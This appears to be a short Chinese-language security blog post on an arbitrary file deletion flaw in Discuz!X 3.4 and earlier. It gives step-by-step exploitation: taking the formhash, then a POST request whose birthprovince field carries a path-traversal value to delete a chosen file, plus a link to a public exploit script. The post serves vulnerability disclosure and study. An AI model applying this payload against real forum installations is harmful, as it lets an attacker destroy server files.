Discuz!X <=3.4任意刪除漏洞

释放双眼,带上耳机,听听看~!

漏洞影響Discuz3.4以下所有版本

1.首先註冊一個普通權限的賬戶

賬戶登錄之後,點擊設置,跳轉到個人資料界面,查看源代碼,獲取formhash值

這裏的formhash值是9945c60c

2.提交請求,修改出生地

這裏可以使用Burp截斷修改

提交請求:

http://127.0.0.1/home.php?mod=spacecp&ac=profile&op=base
[post] birthprovince=../../../theTestFile.txt&profilesubmit=1&formhash=9945c60c

也可以使用利用腳本:(https://github.com/CHYbeta/cmsPoc/blob/master/scripts/discuz/v34_delete_arbitrary_files.py

粘貼Cookice,後輸入要刪除的文件

WEB安全漏洞质量好文

WordPress <= 4.7.1 PHPMailer < 5.2.18任意命令執行漏洞(CVE-2016-10033)

2020-6-7 21:20:09

漏洞

从 pipePotato 中学习 Windows Access Token 令牌模拟

2020-6-8 18:35:58

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
有新私信 私信列表
搜索